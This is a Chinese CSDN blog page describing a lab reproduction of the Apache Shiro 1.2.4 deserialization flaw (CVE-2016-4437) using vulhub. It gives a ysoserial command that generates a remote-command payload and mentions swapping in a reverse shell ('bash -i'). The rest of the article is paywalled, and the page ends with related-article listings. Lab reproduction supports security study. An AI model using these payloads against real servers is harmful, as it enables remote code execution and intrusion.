Apache Shiro 1.2.4反序列化漏洞复现

最新推荐文章于 2024-06-07 07:31:44 发布
最新推荐文章于 2024-06-07 07:31:44 发布
阅读量352 收藏 3
点赞数 2
分类专栏: 漏洞复现 文章标签: 渗透测试 shiro 安全漏洞 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43223153/article/details/117770821
版权
本文详细介绍了Apache Shiro 1.2.4版本的反序列化漏洞复现过程。首先,通过搭建vulhub靶场和安装ysoserial工具来准备环境。接着,利用默认账号密码登录并生成CommonsBeanutils1的Gadget。然后,使用Shiro的默认密钥加密Payload,并在Burp Suite中抓包替换cookie。成功放包后,验证了漏洞利用效果,发现攻击者可以利用此漏洞执行任意命令。最后,建议升级到Shiro的最新版本以避免安全风险。
摘要由CSDN通过智能技术生成

Apache Shiro 1.2.4反序列化漏洞复现

1. 环境搭建
安装漏洞靶场vulhub

git clone git://github.com/vulhub/vulhub.git

下载安装ysoserial

项目源地址:https://github.com/frohoff/ysoserial
jar包下载地址:https://jitpack.io/com/github/frohoff/ysoserial/master-d367e379d9-1/ysoserial-master-d367e379d9-1.jar

2. 漏洞复现
1、 进入到我们下载好的vulhub shiro反序列化漏洞靶场:

cd vulhub/shiro/CVE-2016-4437/
docker-compose up -d

2、打开我们本地的浏览器访问虚拟机的IP地址加8080端口:
在这里插入图片描述
默认的登陆账号密码:admin\vulhub
3、使用ysoserial生成CommonsBeanutils1的Gadget:

java -jar ysoserial-master-SNAPSHOT.jar CommonsBeanutils1 "touch /opt/wula" > poc.ser
# 要反弹sheel的就将命令换成反弹shell命令,ysoserial命令也需要更换,这里就不做详解了。
bash -i
最低0.47元/天 解锁文章
月光下的她很美
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
shiro 如何判断登录过_Shiro详解
weixin_39737636的博客
11-26 5727
【63】ShiroShiro简介SpringMVC整合ShiroShiro是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能。Authentication:身份认证/登录,验证用户是不是拥有相应的身份;Authorization:授权,即权限验证,验证某个已认证的用户是否拥有某个权限;即判断用户是否能做事情,常见的如:验证某个用户是否拥有某个角色。或者细粒度的验证某个用户对...
ysoserial-all.jar
08-04
ysoserial的最终版,兼容之前所有版本。放心食用。
shiro序列漏洞学习(工具+原理+
最新发布
Innocence_0的博客
06-07 660
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
Shiro框架漏洞总结
zhuyi666的博客
03-23 7925
Apache Shiro是一个强大且易用的Java安全框架,能够用于身份验证、授权、加密和会话管理。只要rememberMe的AES加密密钥泄露,无论shiro是什么版本都会导致序列漏洞Shiro拥有易于理解的API,您可以快速、轻松地获得任何应用程序——从最小的移动应用程序到最大的网络和企业应用程序。
详细shiro漏洞及利用方法(CVE-2016-4437)
热门推荐
dreamthe的博客
04-26 2万+
该篇文章比较详细的介绍shiro漏洞利用,无论是shiro漏洞图形工具利用,还是shiro漏洞结合JRMP我觉得比大多数文章都详细,如果你对网上结合JRMP弹shell不是很明白,非常推荐来看看这篇文章。另外漏洞利用工程中用到的工具以及代码都上传到百度网盘,供大家使用,在文章最后哦。
Apache shiro1.2.4序列漏洞介绍.docx
07-01
然而,在Apache Shiro 1.2.4及其更早的版本中,存在一个严重的序列漏洞。这个漏洞主要与RememberMe服务的实有关。在处理RememberMe的Cookie时,Shiro的`CookieRememberMeManager`类会执行一系列操作:首先,它...
Shiro序列漏洞检测工具
01-05
1. **升级Shiro版本**:确保Shiro框架的版本高于1.2.4,因为从1.2.5开始,Apache Shiro已经修了这个序列漏洞。 2. **禁用不必要的序列**:避免在不受信任的输入上进行序列,尤其是在处理网络数据时。 3....
Shiro序列漏洞Shiro版本升级资源
06-22
从上面我们了解到,序列漏洞主要是由于硬编码引起的,那么只要解决硬编码,就解决了该漏洞。解决硬编码主要有两种方式: 方法一:自行实key值 方法二:升级到1.2.5版本或以上 那么在我的项目中,选择的是升级...
第03篇:Shiro 序列漏洞利用汇总1
08-03
本文主要关注Shiro中的两个安全漏洞,一个是RememberMe序列漏洞Shiro-550),另一个是Padding Oracle Attack(Shiro-721),以及如何进行自动漏洞利用。 1. Shiro RememberMe序列漏洞Shiro-550) 这...
ysoserial.jar
12-16
ysoserial 是安全测试 playload 生成工具
Shiro序列漏洞详细分析 .pdf
09-05
本文主要探讨了Shiro中的一个严重安全漏洞,即shiro-550序列漏洞,以及与其相关的shiro-721 Padding Oracle Attack。这个漏洞可能导致攻击者执行任意代码,对企业的业务风控和信息安全构成威胁。 **shiro-550...
【JAVA序列扫描工具】简介、下载、安装、使用
04-22 5003
序列扫描工具】
Apache shiro 漏洞总结
星落的博客
08-01 4575
Apache shiro 漏洞总结 Apache shiro是一个强大灵活的开源安全框架,可以完全处理身份验证、授权、密码和会话管理。
Apache Shiro系列漏洞利用以及实战总结
jammny
10-14 1万+
前言: Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。内置了可以连接大量安全数据源(又名目录)的Realm,如LDAP、关系数据库(JDBC)、类似INI的文本配置资源以及属性文件等。 目录 RememberMe RCE-550(CVE-2016-4437) 远程安全限制绕过漏洞(CVE-2016-6802) Padding Orac
框架、组件漏洞系列4:Apache shiro漏洞汇总
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
12-14 3717
一、Apache Shiro 简介 1、什么是shiro Apache Shiro提供了认证、授权、加密和会话管理功能,将杂的问题隐藏起来,提供清晰直观的API使开发者可以很轻松地开发自己的程序安全代码。并且在实此目标时无须依赖第三方的框架、容器或服务,当然也能做到与这些环境的整合,使其在任何环境下都可拿来使用。 Shiro将目标集中于Shiro开发团队所称的“四大安全基石”-认证(Authentication)、授权(Authorization)、会话管理(Session Management)和加.
Apache Shiro 1.2.4序列漏洞
07-27
Apache Shiro 1.2.4版本之前存在一个序列漏洞。在这个版本之前,默认的ASE密钥是固定的,这意味着攻击者可以直接序列执行恶意代码。然而,在1.2.4版本之后,ASE密钥不再是默认的,需要获取到密钥才能进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值